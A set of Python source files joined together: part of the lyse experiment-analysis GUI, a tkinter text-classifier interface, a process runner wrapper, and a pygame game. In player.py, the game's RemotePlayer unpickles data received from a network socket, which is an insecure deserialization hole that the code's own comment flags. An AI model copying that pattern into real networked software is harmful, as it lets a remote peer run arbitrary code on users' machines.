self.ui.progressBar_add_shots.hide()
container.addWidget(self.ui)
self.shots_model = DataFrameModel(self.ui.tableView, self.exp_config)
set_auto_scroll_to_end(self.ui.tableView.verticalScrollBar())
self.edit_columns_dialog = EditColumns(self, self.shots_model.column_names, self.shots_model.columns_visible)
self.last_opened_shots_folder = self.exp_config.get('paths', 'experiment_shot_storage')
self.connect_signals()
self.analysis_paused = False
self.multishot_required = False
# An Event to let the analysis thread know to check for shots that
# need analysing, rather than using a time.sleep:
self.analysis_pending = threading.Event()
# The folder that the 'add shots' dialog will open to:
self.current_folder = self.exp_config.get('paths', 'experiment_shot_storage')
# A queue for storing incoming files from the ZMQ server so
# the server can keep receiving files even if analysis is slow
# or paused:
self.incoming_queue = queue.Queue()
# Start the thread to handle incoming files, and store them in
# a buffer if processing is paused:
self.incoming = threading.Thread(target=self.incoming_buffer_loop)
self.incoming.daemon = True
self.incoming.start()
self.analysis = threading.Thread(target = self.analysis_loop)
self.analysis.daemon = True
self.analysis.start()
def connect_signals(self):
self.ui.pushButton_edit_columns.clicked.connect(self.on_edit_columns_clicked)
self.shots_model.columns_changed.connect(self.on_columns_changed)
self.ui.toolButton_add_shots.clicked.connect(self.on_add_shot_files_clicked)
self.ui.toolButton_remove_shots.clicked.connect(self.shots_model.on_remove_selection)
self.ui.tableView.doubleLeftClicked.connect(self.shots_model.on_double_click)
self.ui.pushButton_analysis_running.toggled.connect(self.on_analysis_running_toggled)
self.ui.pushButton_mark_as_not_done.clicked.connect(self.on_mark_selection_not_done_clicked)
self.ui.pushButton_run_multishot_analysis.clicked.connect(self.on_run_multishot_analysis_clicked)
def on_edit_columns_clicked(self):
self.edit_columns_dialog.show()
def on_columns_changed(self):
column_names = self.shots_model.column_names
columns_visible = self.shots_model.columns_visible
self.edit_columns_dialog.update_columns(column_names, columns_visible)
def on_add_shot_files_clicked(self):
shot_files = QtWidgets.QFileDialog.getOpenFileNames(self.ui,
'Select shot files',
self.last_opened_shots_folder,
"HDF5 files (*.h5)")
if type(shot_files) is tuple:
shot_files, _ = shot_files
if not shot_files:
# User cancelled selection
return
# Convert to standard platform specific path, otherwise Qt likes forward slashes:
shot_files = [os.path.abspath(shot_file) for shot_file in shot_files]
# Save the containing folder for use next time we open the dialog box:
self.last_opened_shots_folder = os.path.dirname(shot_files[0])
# Queue the files to be opened:
for filepath in shot_files:
self.incoming_queue.put(filepath)
def on_analysis_running_toggled(self, pressed):
if pressed:
self.analysis_paused = True
self.ui.pushButton_analysis_running.setIcon(QtGui.QIcon(':qtutils/fugue/control'))
self.ui.pushButton_analysis_running.setText('Analysis paused')
else:
self.analysis_paused = False
self.ui.pushButton_analysis_running.setIcon(QtGui.QIcon(':qtutils/fugue/control'))
self.ui.pushButton_analysis_running.setText('Analysis running')
self.analysis_pending.set()
def on_mark_selection_not_done_clicked(self):
self.shots_model.mark_selection_not_done()
# Let the analysis loop know to look for these shots:
self.analysis_pending.set()
def on_run_multishot_analysis_clicked(self):
self.multishot_required = True
self.analysis_pending.set()
def set_columns_visible(self, columns_visible):
self.shots_model.set_columns_visible(columns_visible)
@inmain_decorator()
def set_add_shots_progress(self, completed, total, message):
self.ui.progressBar_add_shots.setFormat("Adding shots: [{}] %v/%m (%p%)".format(message))
if completed == total and message is None:
self.ui.progressBar_add_shots.hide()
else:
if total is not None:
self.ui.progressBar_add_shots.setMaximum(total)
if completed is not None:
self.ui.progressBar_add_shots.setValue(completed)
if self.ui.progressBar_add_shots.isHidden():
self.ui.progressBar_add_shots.show()
if completed is None and total is None and message is not None:
# Ensure a repaint when only the message changes:
self.ui.progressBar_add_shots.repaint()
def incoming_buffer_loop(self):
"""We use a queue as a buffer for incoming shots. We don't want to hang and not
respond to a client submitting shots, so we just let shots pile up here until we can get to them.
The downside to this is that we can't return errors to the client if the shot cannot be added,
but the suggested workflow is to handle errors here anyway. A client running shots shouldn't stop
the experiment on account of errors from the analyis stage, so what's the point of passing errors to it?
We'll just raise errors here and the user can decide what to do with them."""
logger = logging.getLogger('lyse.FileBox.incoming')
# HDF5 prints lots of errors by default, for things that aren't
# actually errors. These are silenced on a per thread basis,
# and automatically silenced in the main thread when h5py is
# imported. So we'll silence them in this thread too:
h5py._errors.silence_errors()
n_shots_added = 0
while True:
try:
filepaths = []
filepath = self.incoming_queue.get()
filepaths.append(filepath)
if self.incoming_queue.qsize() == 0:
# Wait momentarily in case more arrive so we can batch process them:
time.sleep(0.1)
# Batch process to decrease number of dataframe concatenations:
batch_size = len(self.shots_model.dataframe) // 3 + 1
while True:
try:
filepath = self.incoming_queue.get(False)
except queue.Empty:
break
else:
filepaths.append(filepath)
if len(filepaths) >= batch_size:
break
logger.info('adding:\n%s' % '\n'.join(filepaths))
if n_shots_added == 0:
total_shots = self.incoming_queue.qsize() + len(filepaths)
self.set_add_shots_progress(1, total_shots, "reading shot files")
# Remove duplicates from the list (preserving order) in case the
# client sent the same filepath multiple times:
filepaths = sorted(set(filepaths), key=filepaths.index) # Inefficient but readable
# We open the HDF5 files here outside the GUI thread so as not to hang the GUI:
dataframes = []
indices_of_files_not_found = []
for i, filepath in enumerate(filepaths):
try:
dataframe = get_dataframe_from_shot(filepath)
dataframes.append(dataframe)
except IOError:
app.output_box.output('Warning: Ignoring shot file not found or not readable %s\n' % filepath, red=True)
indices_of_files_not_found.append(i)
n_shots_added += 1
shots_remaining = self.incoming_queue.qsize()
total_shots = n_shots_added + shots_remaining + len(filepaths) - (i + 1)
self.set_add_shots_progress(n_shots_added, total_shots, "reading shot files")
self.set_add_shots_progress(n_shots_added, total_shots, "concatenating dataframes")
if dataframes:
new_row_data = concat_with_padding(*dataframes)
else:
new_row_data = None
# Do not add the shots that were not found on disk. Reverse
# loop so that removing an item doesn't change the indices of
# subsequent removals:
for i in reversed(indices_of_files_not_found):
del filepaths[i]
if filepaths:
self.shots_model.add_files(filepaths, new_row_data)
# Let the analysis loop know to look for new shots:
self.analysis_pending.set()
if shots_remaining == 0:
self.set_add_shots_progress(n_shots_added, total_shots, None)
n_shots_added = 0 # reset our counter for the next batch
except Exception:
# Keep this incoming loop running at all costs, but make the
# otherwise uncaught exception visible to the user:
zprocess.raise_exception_in_thread(sys.exc_info())
def analysis_loop(self):
logger = logging.getLogger('lyse.FileBox.analysis_loop')
# HDF5 prints lots of errors by default, for things that aren't
# actually errors. These are silenced on a per thread basis,
# and automatically silenced in the main thread when h5py is
# imported. So we'll silence them in this thread too:
h5py._errors.silence_errors()
while True:
try:
self.analysis_pending.wait()
self.analysis_pending.clear()
at_least_one_shot_analysed = False
while True:
if not self.analysis_paused:
# Find the first shot that has not finished being analysed:
filepath = self.shots_model.get_first_incomplete()
if filepath is not None:
logger.info('analysing: %s'%filepath)
self.do_singleshot_analysis(filepath)
at_least_one_shot_analysed = True
if filepath is None and at_least_one_shot_analysed:
self.multishot_required = True
if filepath is None:
break
if self.multishot_required:
logger.info('doing multishot analysis')
self.do_multishot_analysis()
else:
logger.info('analysis is paused')
break
if self.multishot_required:
logger.info('doing multishot analysis')
self.do_multishot_analysis()
except Exception:
etype, value, tb = sys.exc_info()
orig_exception = ''.join(traceback.format_exception_only(etype, value))
message = ('Analysis loop encountered unexpected exception. ' +
'This is a bug and should be reported. The analysis ' +
'loop is continuing, but lyse may be in an inconsistent state. '
'Restart lyse, or continue at your own risk. '
'Original exception was:\n\n' + orig_exception)
# Raise the exception in a thread so we can keep running
zprocess.raise_exception_in_thread((RuntimeError, RuntimeError(message), tb))
self.pause_analysis()
@inmain_decorator()
def pause_analysis(self):
# This automatically triggers the slot that sets self.analysis_paused
self.ui.pushButton_analysis_running.setChecked(True)
def do_singleshot_analysis(self, filepath):
# Check the shot file exists before sending it to the singleshot
# routinebox. This does not guarantee it won't have been deleted by
# the time the routinebox starts running analysis on it, but by
# detecting it now we can most of the time avoid the user code
# coughing exceptions due to the file not existing. Which would also
# not be a problem, but this way we avoid polluting the outputbox with
# more errors than necessary.
if not os.path.exists(filepath):
self.shots_model.mark_as_deleted_off_disk(filepath)
return
self.to_singleshot.put(filepath)
while True:
signal, status_percent, updated_data = self.from_singleshot.get()
for file in updated_data:
# Update the data for all the rows with new data:
self.shots_model.update_row(file, updated_row_data=updated_data[file])
# Update the status percent for the the row on which analysis is actually running:
self.shots_model.update_row(filepath, status_percent=status_percent, dataframe_already_updated=True)
if signal == 'done':
return
if signal == 'error':
if not os.path.exists(filepath):
# Do not pause if the file has been deleted. An error is
# no surprise there:
self.shots_model.mark_as_deleted_off_disk(filepath)
else:
self.pause_analysis()
return
if signal == 'progress':
continue
raise ValueError('invalid signal %s' % str(signal))
def do_multishot_analysis(self):
self.to_multishot.put(None)
while True:
signal, _, updated_data = self.from_multishot.get()
for file in updated_data:
self.shots_model.update_row(file, updated_row_data=updated_data[file])
if signal == 'done':
self.multishot_required = False
return
elif signal == 'error':
self.pause_analysis()
return
class Lyse(object):
def __init__(self):
splash.update_text('loading graphical interface')
loader = UiLoader()
self.ui = loader.load(os.path.join(LYSE_DIR, 'main.ui'), LyseMainWindow())
self.connect_signals()
self.setup_config()
self.port = int(self.exp_config.get('ports', 'lyse'))
# The singleshot routinebox will be connected to the filebox
# by queues:
to_singleshot = queue.Queue()
from_singleshot = queue.Queue()
# So will the multishot routinebox:
to_multishot = queue.Queue()
from_multishot = queue.Queue()
self.output_box = OutputBox(self.ui.verticalLayout_output_box)
self.singleshot_routinebox = RoutineBox(self.ui.verticalLayout_singleshot_routinebox, self.exp_config,
self, to_singleshot, from_singleshot, self.output_box.port)
self.multishot_routinebox = RoutineBox(self.ui.verticalLayout_multishot_routinebox, self.exp_config,
self, to_multishot, from_multishot, self.output_box.port, multishot=True)
self.filebox = FileBox(self.ui.verticalLayout_filebox, self.exp_config,
to_singleshot, from_singleshot, to_multishot, from_multishot)
self.last_save_config_file = None
self.last_save_data = None
self.ui.actionLoad_configuration.triggered.connect(self.on_load_configuration_triggered)
self.ui.actionRevert_configuration.triggered.connect(self.on_revert_configuration_triggered)
self.ui.actionSave_configuration.triggered.connect(self.on_save_configuration_triggered)
self.ui.actionSave_configuration_as.triggered.connect(self.on_save_configuration_as_triggered)
self.ui.actionSave_dataframe_as.triggered.connect(lambda: self.on_save_dataframe_triggered(True))
self.ui.actionSave_dataframe.triggered.connect(lambda: self.on_save_dataframe_triggered(False))
self.ui.actionLoad_dataframe.triggered.connect(self.on_load_dataframe_triggered)
self.ui.resize(1600, 900)
# Set the splitters to appropriate fractions of their maximum size:
self.ui.splitter_horizontal.setSizes([1000, 600])
self.ui.splitter_vertical.setSizes([300, 600])
# autoload a config file, if labconfig is set to do so:
try:
autoload_config_file = self.exp_config.get('lyse', 'autoload_config_file')
except (LabConfig.NoOptionError, LabConfig.NoSectionError):
self.output_box.output('Ready.\n\n')
else:
self.ui.setEnabled(False)
self.output_box.output('Loading default config file %s...' % autoload_config_file)
def load_the_config_file():
try:
self.load_configuration(autoload_config_file, restore_window_geometry)
self.output_box.output('done.\n')
except Exception as e:
self.output_box.output('\nCould not load config file: %s: %s\n\n' %
(e.__class__.__name__, str(e)), red=True)
else:
self.output_box.output('Ready.\n\n')
finally:
self.ui.setEnabled(True)
# Load the window geometry now, but then defer the other loading until 50ms
# after the window has shown, so that the GUI pops up faster in the meantime.
try:
self.load_window_geometry_configuration(autoload_config_file)
except Exception:
# ignore error for now and let it be raised again in the call to load_configuration:
restore_window_geometry = True
else:
# Success - skip loading window geometry in load_configuration:
restore_window_geometry = False
self.ui.firstPaint.connect(lambda: QtCore.QTimer.singleShot(50, load_the_config_file))
self.ui.show()
# self.ui.showMaximized()
def terminate_all_workers(self):
for routine in self.singleshot_routinebox.routines + self.multishot_routinebox.routines:
routine.end_child()
def workers_terminated(self):
terminated = {}
for routine in self.singleshot_routinebox.routines + self.multishot_routinebox.routines:
routine.worker.poll()
terminated[routine.filepath] = routine.worker.returncode is not None
return terminated
def are_you_sure(self):
message = ('Current configuration (which scripts are loaded and other GUI state) '
'has changed: save config file \'%s\'?' % self.last_save_config_file)
reply = QtWidgets.QMessageBox.question(self.ui, 'Quit lyse', message,
QtWidgets.QMessageBox.Yes | QtWidgets.QMessageBox.No | QtWidgets.QMessageBox.Cancel)
if reply == QtWidgets.QMessageBox.Cancel:
return False
if reply == QtWidgets.QMessageBox.Yes:
self.save_configuration(self.last_save_config_file)
return True
def on_close_event(self):
save_data = self.get_save_data()
if self.last_save_data is not None and save_data != self.last_save_data:
if self.only_window_geometry_is_different(save_data, self.last_save_data):
self.save_configuration(self.last_save_config_file)
self.terminate_all_workers()
return True
elif not self.are_you_sure():
return False
self.terminate_all_workers()
return True
def on_save_configuration_triggered(self):
if self.last_save_config_file is None:
self.on_save_configuration_as_triggered()
self.ui.actionSave_configuration_as.setEnabled(True)
self.ui.actionRevert_configuration.setEnabled(True)
else:
self.save_configuration(self.last_save_config_file)
def on_revert_configuration_triggered(self):
save_data = self.get_save_data()
if self.last_save_data is not None and save_data != self.last_save_data:
message = 'Revert configuration to the last saved state in \'%s\'?' % self.last_save_config_file
reply = QtWidgets.QMessageBox.question(self.ui, 'Load configuration', message,
QtWidgets.QMessageBox.Yes | QtWidgets.QMessageBox.Cancel)
if reply == QtWidgets.QMessageBox.Cancel:
return
elif reply == QtWidgets.QMessageBox.Yes:
self.load_configuration(self.last_save_config_file)
else:
error_dialog('no changes to revert')
def on_save_configuration_as_triggered(self):
if self.last_save_config_file is not None:
default = self.last_save_config_file
else:
try:
default_path = os.path.join(self.exp_config.get('DEFAULT', 'app_saved_configs'), 'lyse')
except LabConfig.NoOptionError:
self.exp_config.set('DEFAULT', 'app_saved_configs', os.path.join('%(labscript_suite)s', 'userlib', 'app_saved_configs', '%(experiment_name)s'))
default_path = os.path.join(self.exp_config.get('DEFAULT', 'app_saved_configs'), 'lyse')
if not os.path.exists(default_path):
os.makedirs(default_path)
default = os.path.join(default_path, 'lyse.ini')
save_file = QtWidgets.QFileDialog.getSaveFileName(self.ui,
'Select file to save current lyse configuration',
default,
"config files (*.ini)")
if type(save_file) is tuple:
save_file, _ = save_file
if not save_file:
# User cancelled
return
# Convert to standard platform specific path, otherwise Qt likes
# forward slashes:
save_file = os.path.abspath(save_file)
self.save_configuration(save_file)
def only_window_geometry_is_different(self, current_data, old_data):
ui_keys = ['window_size', 'window_pos', 'splitter', 'splitter_vertical', 'splitter_horizontal']
compare = [current_data[key] == old_data[key] for key in current_data.keys() if key not in ui_keys]
return all(compare)
def get_save_data(self):
save_data = {}
box = self.singleshot_routinebox
save_data['SingleShot'] = list(zip([routine.filepath for routine in box.routines],
[box.model.item(row, box.COL_ACTIVE).checkState()
for row in range(box.model.rowCount())]))
save_data['LastSingleShotFolder'] = box.last_opened_routine_folder
box = self.multishot_routinebox
save_data['MultiShot'] = list(zip([routine.filepath for routine in box.routines],
[box.model.item(row, box.COL_ACTIVE).checkState()
for row in range(box.model.rowCount())]))
save_data['LastMultiShotFolder'] = box.last_opened_routine_folder
save_data['LastFileBoxFolder'] = self.filebox.last_opened_shots_folder
save_data['analysis_paused'] = self.filebox.analysis_paused
window_size = self.ui.size()
save_data['window_size'] = (window_size.width(), window_size.height())
window_pos = self.ui.pos()
save_data['window_pos'] = (window_pos.x(), window_pos.y())
save_data['screen_geometry'] = get_screen_geometry()
save_data['splitter'] = self.ui.splitter.sizes()
save_data['splitter_vertical'] = self.ui.splitter_vertical.sizes()
save_data['splitter_horizontal'] = self.ui.splitter_horizontal.sizes()
return save_data
def save_configuration(self, save_file):
lyse_config = LabConfig(save_file)
save_data = self.get_save_data()
self.last_save_config_file = save_file
self.last_save_data = save_data
for key, value in save_data.items():
lyse_config.set('lyse_state', key, pprint.pformat(value))
def on_load_configuration_triggered(self):
save_data = self.get_save_data()
if self.last_save_data is not None and save_data != self.last_save_data:
message = ('Current configuration (which groups are active/open and other GUI state) '
'has changed: save config file \'%s\'?' % self.last_save_config_file)
reply = QtWidgets.QMessageBox.question(self.ui, 'Load configuration', message,
QtWidgets.QMessageBox.Yes | QtWidgets.QMessageBox.No | QtWidgets.QMessageBox.Cancel)
if reply == QtWidgets.QMessageBox.Cancel:
return
if reply == QtWidgets.QMessageBox.Yes:
self.save_configuration(self.last_save_config_file)
if self.last_save_config_file is not None:
default = self.last_save_config_file
else:
default = os.path.join(self.exp_config.get('paths', 'experiment_shot_storage'), 'lyse.ini')
file = QtWidgets.QFileDialog.getOpenFileName(self.ui,
'Select lyse configuration file to load',
default,
"config files (*.ini)")
if type(file) is tuple:
file, _ = file
if not file:
# User cancelled
return
# Convert to standard platform specific path, otherwise Qt likes
# forward slashes:
file = os.path.abspath(file)
self.load_configuration(file)
def load_configuration(self, filename, restore_window_geometry=True):
self.last_save_config_file = filename
self.ui.actionSave_configuration.setText('Save configuration %s' % filename)
lyse_config = LabConfig(filename)
try:
self.singleshot_routinebox.add_routines(ast.literal_eval(lyse_config.get('lyse_state', 'SingleShot')), clear_existing=True)
except (LabConfig.NoOptionError, LabConfig.NoSectionError):
pass
try:
self.singleshot_routinebox.last_opened_routine_folder = ast.literal_eval(lyse_config.get('lyse_state', 'LastSingleShotFolder'))
except (LabConfig.NoOptionError, LabConfig.NoSectionError):
pass
try:
self.multishot_routinebox.add_routines(ast.literal_eval(lyse_config.get('lyse_state', 'MultiShot')), clear_existing=True)
except (LabConfig.NoOptionError, LabConfig.NoSectionError):
pass
try:
self.multishot_routinebox.last_opened_routine_folder = ast.literal_eval(lyse_config.get('lyse_state', 'LastMultiShotFolder'))
except (LabConfig.NoOptionError, LabConfig.NoSectionError):
pass
try:
self.filebox.last_opened_shots_folder = ast.literal_eval(lyse_config.get('lyse_state', 'LastFileBoxFolder'))
except (LabConfig.NoOptionError, LabConfig.NoSectionError):
pass
try:
if ast.literal_eval(lyse_config.get('lyse_state', 'analysis_paused')):
self.filebox.pause_analysis()
except (LabConfig.NoOptionError, LabConfig.NoSectionError):
pass
if restore_window_geometry:
self.load_window_geometry_configuration(filename)
# Set as self.last_save_data:
save_data = self.get_save_data()
self.last_save_data = save_data
self.ui.actionSave_configuration_as.setEnabled(True)
self.ui.actionRevert_configuration.setEnabled(True)
def load_window_geometry_configuration(self, filename):
"""Load only the window geometry from the config file. It's useful to have this
separate from the rest of load_configuration so that it can be called before the
window is shown."""
lyse_config = LabConfig(filename)
try:
screen_geometry = ast.literal_eval(lyse_config.get('lyse_state', 'screen_geometry'))
except (LabConfig.NoOptionError, LabConfig.NoSectionError):
pass
else:
# Only restore the window size and position, and splitter
# positions if the screen is the same size/same number of monitors
# etc. This prevents the window moving off the screen if say, the
# position was saved when 2 monitors were plugged in but there is
# only one now, and the splitters may not make sense in light of a
# different window size, so better to fall back to defaults:
current_screen_geometry = get_screen_geometry()
if current_screen_geometry == screen_geometry:
try:
self.ui.resize(*ast.literal_eval(lyse_config.get('lyse_state', 'window_size')))
except (LabConfig.NoOptionError, LabConfig.NoSectionError):
pass
try:
self.ui.move(*ast.literal_eval(lyse_config.get('lyse_state', 'window_pos')))
except (LabConfig.NoOptionError, LabConfig.NoSectionError):
pass
try:
self.ui.splitter.setSizes(ast.literal_eval(lyse_config.get('lyse_state', 'splitter')))
except (LabConfig.NoOptionError, LabConfig.NoSectionError):
pass
try:
self.ui.splitter_vertical.setSizes(ast.literal_eval(lyse_config.get('lyse_state', 'splitter_vertical')))
except (LabConfig.NoOptionError, LabConfig.NoSectionError):
pass
try:
self.ui.splitter_horizontal.setSizes(ast.literal_eval(lyse_config.get('lyse_state', 'splitter_horizontal')))
except (LabConfig.NoOptionError, LabConfig.NoSectionError):
pass
def setup_config(self):
required_config_params = {"DEFAULT": ["experiment_name"],
"programs": ["text_editor",
"text_editor_arguments",
"hdf5_viewer",
"hdf5_viewer_arguments"],
"paths": ["shared_drive",
"experiment_shot_storage",
"analysislib"],
"ports": ["lyse"]
}
self.exp_config = LabConfig(required_params=required_config_params)
def connect_signals(self):
if os.name == 'nt':
self.ui.newWindow.connect(set_win_appusermodel)
# Keyboard shortcuts:
QtWidgets.QShortcut('Del', self.ui, lambda: self.delete_items(True))
QtWidgets.QShortcut('Shift+Del', self.ui, lambda: self.delete_items(False))
def on_save_dataframe_triggered(self, choose_folder=True):
df = self.filebox.shots_model.dataframe.copy()
if len(df) > 0:
default = self.exp_config.get('paths', 'experiment_shot_storage')
if choose_folder:
save_path = QtWidgets.QFileDialog.getExistingDirectory(self.ui, 'Select a Folder for the Dataframes', default)
if type(save_path) is tuple:
save_path, _ = save_path
if not save_path:
# User cancelled
return
sequences = df.sequence.unique()
for sequence in sequences:
sequence_df = pandas.DataFrame(df[df['sequence'] == sequence], columns=df.columns).dropna(axis=1, how='all')
labscript = sequence_df['labscript'].iloc[0]
filename = "dataframe_{}_{}.msg".format(sequence.to_pydatetime().strftime("%Y%m%dT%H%M%S"),labscript[:-3])
if not choose_folder:
save_path = os.path.dirname(sequence_df['filepath'].iloc[0])
sequence_df.infer_objects()
for col in sequence_df.columns :
if sequence_df[col].dtype == object:
sequence_df[col] = pandas.to_numeric(sequence_df[col], errors='ignore')
sequence_df.to_msgpack(os.path.join(save_path, filename))
else:
error_dialog('Dataframe is empty')
def on_load_dataframe_triggered(self):
default = os.path.join(self.exp_config.get('paths', 'experiment_shot_storage'), 'dataframe.msg')
file = QtWidgets.QFileDialog.getOpenFileName(self.ui,
'Select dataframe file to load',
default,
"dataframe files (*.msg)")
if type(file) is tuple:
file, _ = file
if not file:
# User cancelled
return
# Convert to standard platform specific path, otherwise Qt likes
# forward slashes:
file = os.path.abspath(file)
df = pandas.read_msgpack(file).sort_values("run time").reset_index()
# Check for changes in the shot files since the dataframe was exported
def changed_since(filepath, time):
if os.path.isfile(filepath):
return os.path.getmtime(filepath) > time
else:
return False
filepaths = df["filepath"].tolist()
changetime_cache = os.path.getmtime(file)
need_updating = np.where(map(lambda x: changed_since(x, changetime_cache), filepaths))[0]
need_updating = np.sort(need_updating)[::-1] # sort in descending order to not remove the wrong items with pop
# Reload the files where changes where made since exporting
for index in need_updating:
filepath = filepaths.pop(index)
self.filebox.incoming_queue.put(filepath)
df = df.drop(need_updating)
self.filebox.shots_model.add_files(filepaths, df, done=True)
def delete_items(self, confirm):
"""Delete items from whichever box has focus, with optional confirmation
dialog"""
if self.filebox.ui.tableView.hasFocus():
self.filebox.shots_model.remove_selection(confirm)
if self.singleshot_routinebox.ui.treeView.hasFocus():
self.singleshot_routinebox.remove_selection(confirm)
if self.multishot_routinebox.ui.treeView.hasFocus():
self.multishot_routinebox.remove_selection(confirm)
if __name__ == "__main__":
logger = setup_logging('lyse')
labscript_utils.excepthook.set_logger(logger)
logger.info('\n\n===============starting===============\n')
qapplication = QtWidgets.QApplication(sys.argv)
qapplication.setAttribute(QtCore.Qt.AA_DontShowIconsInMenus, False)
app = Lyse()
# Start the web server:
splash.update_text('starting analysis server')
server = WebServer(app.port)
splash.update_text('done')
# Let the interpreter run every 500ms so it sees Ctrl-C interrupts:
timer = QtCore.QTimer()
timer.start(500)
timer.timeout.connect(lambda: None) # Let the interpreter run each 500 ms.
# Upon seeing a ctrl-c interrupt, quit the event loop
signal.signal(signal.SIGINT, lambda *args: qapplication.exit())
splash.hide()
qapplication.exec_()
server.shutdown()
|
tc_ui0.py | #-*- coding:utf-8 -*-
import tkinter as tk
from tkinter import ttk
import tkinter.filedialog as tkf
import tkinter.messagebox as tkm
import time
import threading
import os
def func_thrd_ExecuteCommand():
time.sleep(0.01)
text.delete(0.0,tk.END)
def handle_Input(event):
if event.keycode==13:
global lines
txt=text.get("0.0", "end")
tree.insert("",lines,text="" ,values=(txt,lines))
tree.yview_moveto(1)
lines=lines+1
thrd_once=threading.Thread(target=func_thrd_ExecuteCommand)
thrd_once.start()
def callRB():
global lines
tree.insert("",lines,text="" ,values=(foo.get(),'训练','文本'))
tree.yview_moveto(1)
lines=lines+1
def filecallback():
global lines
#tkm.showinfo('','请选择配置文件')
filename = tkf.askopenfilename()
if filename!='':
text.insert(0.0,filename)
tree.insert("",lines,text="" ,values=(filename,'选择文件:',os.path.basename(filename)))
else:
tree.insert("",lines,text="" ,values=('选择文件/输入预测文本','无','无'))
tree.yview_moveto(1)
lines=lines+1
def traincallback():
global lines
tree.insert("",lines,text="" ,values=('训练文本','训练','文本'))
tree.yview_moveto(1)
lines=lines+1
items=tree.get_children()
tree.selection_set(items[len(items)-1])
def testcallback():
global lines
tree.insert("",lines,text="" ,values=('测试文本','文件','文本'))
tree.yview_moveto(1)
lines=lines+1
def predcallback():
global lines
tree.insert("",lines,text="" ,values=('预测为本','文件','文本'))
tree.yview_moveto(1)
lines=lines+1
if __name__ == "__main__":
window = tk.Tk()
window.title('my window')
window.geometry('500x500')
window.update()
window.rowconfigure(0,weight=1)
window.columnconfigure(0,weight=1)
text = tk.Text(window,height=1)
text.bind('<Key>',func=handle_Input)
text.pack(side='top',fill='x')
#text.grid(row=1,columnspan=4,sticky='ew')
frame=tk.Frame(window)
frame.pack(side='top',fill='x')
btn_file = tk.Button(frame, text ="...", command = filecallback)
btn_file.grid(row=0,column=0)
#btn_file.grid(row=1,column=4,sticky='we')
btn_train = tk.Button(frame, text ="训练", command = traincallback)
btn_train.grid(row=0,column=1)
#btn_train.grid(row=2,column=2,sticky='we')
btn_test = tk.Button(frame, text ="测试", command = testcallback)
btn_test.grid(row=0,column=2)
#btn_test.grid(row=2,column=3,sticky='we')
btn_predict = tk.Button(frame, text ="预测", command = predcallback)
btn_predict.grid(row=0,column=3)
#btn_predict.grid(row=2,column=4,sticky='we')
#frame.grid(row=2,column=1)
#frame.rowconfigure(0,weight=1)
#frame.columnconfigure(0,weight=1)
foo=tk.IntVar(window)
i=4
for t, v in [('卷积神经网络', 1), ('朴素贝叶斯', 2), ('逻辑回归', 3)]:
r = tk.Radiobutton(frame, text=t, value=v,variable=foo,command=callRB)
#r.grid(row=0,column=i,sticky='w')
r.grid(row=0,column=i)
i+=1
lines=0
foo.set(1)
h=window.winfo_height()-text.winfo_height()-frame.winfo_height()
tree=ttk.Treeview(window,show="headings",height=h,selectmode='browse')
tree["columns"]=("text","classification","other")
tree.column("text",width=int(window.winfo_width()*3/5))
tree.column("classification",width=int(window.winfo_width()/5))
tree.column("other",width=int(window.winfo_width()/5))
tree.heading("text",text="输出1",anchor = 'w')
tree.heading("classification",anchor = 'w',text='输出2')
tree.heading("other",anchor = 'w',text='输出3')
#tree.grid(row=4,columnspan=4,sticky='nsew')
vbar = ttk.Scrollbar(window,orient=tk.VERTICAL,command=tree.yview)
#vbar.grid(row=4,column=4,sticky='ns')
vbar.pack(side='right',fill='y')
tree.configure(yscrollcommand=vbar.set)
tree.pack(side='bottom',fill='both')
for j in range(100):
tree.insert("",lines,text="" ,values=(lines,'文件','文本'))
lines=lines+1
window.mainloop()
|
runner.py | import multiprocessing
from ..runner_wrapper import RunnerWrapper
class ProcessRunner(RunnerWrapper):
""" Process Runner Wrapper """
def start(self):
""" Starts runner process """
if self.is_running():
raise RuntimeError("Can't start an already-running runner")
self.runner = multiprocessing.Process(target=self.run)
self.runner.daemon = True
self.runner.start()
def is_running(self):
""" Returns True if runner is active else False """
return self.runner and self.runner.is_alive()
|
player.py | import pygame
import threading
import pickle
from pathlib import Path
from .gameobject import Player, Action, Weapon
from .base_game import Observation, Cell
class RemotePlayer(Player):
def __init__(self, s, *args, **kwargs):
super().__init__(*args, **kwargs)
self.s = s
self.args_kwargs = (args, kwargs)
def decide(self):
# WARNING: don't use pickle in production codes
return pickle.loads(self.conn.recv(256))
def observe(self, sight):
self.conn.sendall(pickle.dumps(sight))
def connect(self):
self.conn, self.addr = self.s.accept()
self.conn.__enter__()
self.conn.sendall(pickle.dumps(self.args_kwargs))
self.conn.recv(128)
def __getstate__(self):
d = self.__dict__.copy()
d.pop('s')
d.pop('conn')
d.pop('addr')
return d
def __setstate__(self, state):
self.__dict__.update(state)
class KeyboardPlayer(Player):
BORDER_SIZE = 25
photos_path = Path(__file__).parent / 'photos'
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.key_pressed = [Action.NOTHING, Action.NOTHING]
self.loaded = False
pygame.init()
listener = threading.Thread(target=self.listener, daemon=True)
listener.start()
def decide(self):
keys = self.key_pressed
self.key_pressed = [Action.NOTHING, Action.NOTHING]
events = pygame.event.get()
for event in events:
if event.type == pygame.KEYDOWN:
if event.key == pygame.K_SPACE:
keys[1] = Action.SHOOT
if keys[0] != Action.NOTHING:
break
if event.key == pygame.K_LEFT:
keys[0] = Action.MOVE_LEFT
elif event.key == pygame.K_RIGHT:
keys[0] = Action.MOVE_RIGHT
elif event.key == pygame.K_UP:
keys[0] = Action.MOVE_UP
elif event.key == pygame.K_DOWN:
keys[0] = Action.MOVE_DOWN
return keys
def listener(self):
while True:
keys = pygame.key.get_pressed()
if keys[pygame.K_LEFT]:
self.key_pressed[0] = Action.MOVE_LEFT
elif keys[pygame.K_RIGHT]:
self.key_pressed[0] = Action.MOVE_RIGHT
elif keys[pygame.K_DOWN]:
self.key_pressed[0] = Action.MOVE_DOWN
elif keys[pygame.K_UP]:
self.key_pressed[0] = Action.MOVE_UP
if keys[pygame.K_SPACE]:
self.key_pressed[1] = Action.SHOOT
def load(self, sight):
if self.loaded:
return
input_map = sight.map_._map
self.WIDTH, self.HEIGHT = (
len(input_map[0]) * sight.cell_size + 2 * self.BORDER_SIZE,
len(input_map) * sight.cell_size + 2 * self.BORDER_SIZE
)
self.WIN = pygame.display.set_mode((self.WIDTH, self.HEIGHT))
pygame.display.set_caption("Brutal story of little Ninja")
self.fence_image_width = pygame.image.load(
self.photos_path / 'top bottom.png')
self.fence_w = pygame.transform.scale(
self.fence_image_width,
(self.WIDTH, self.BORDER_SIZE))
self.fence_image_height = pygame.image.load(
self.photos_path / 'right left.png')
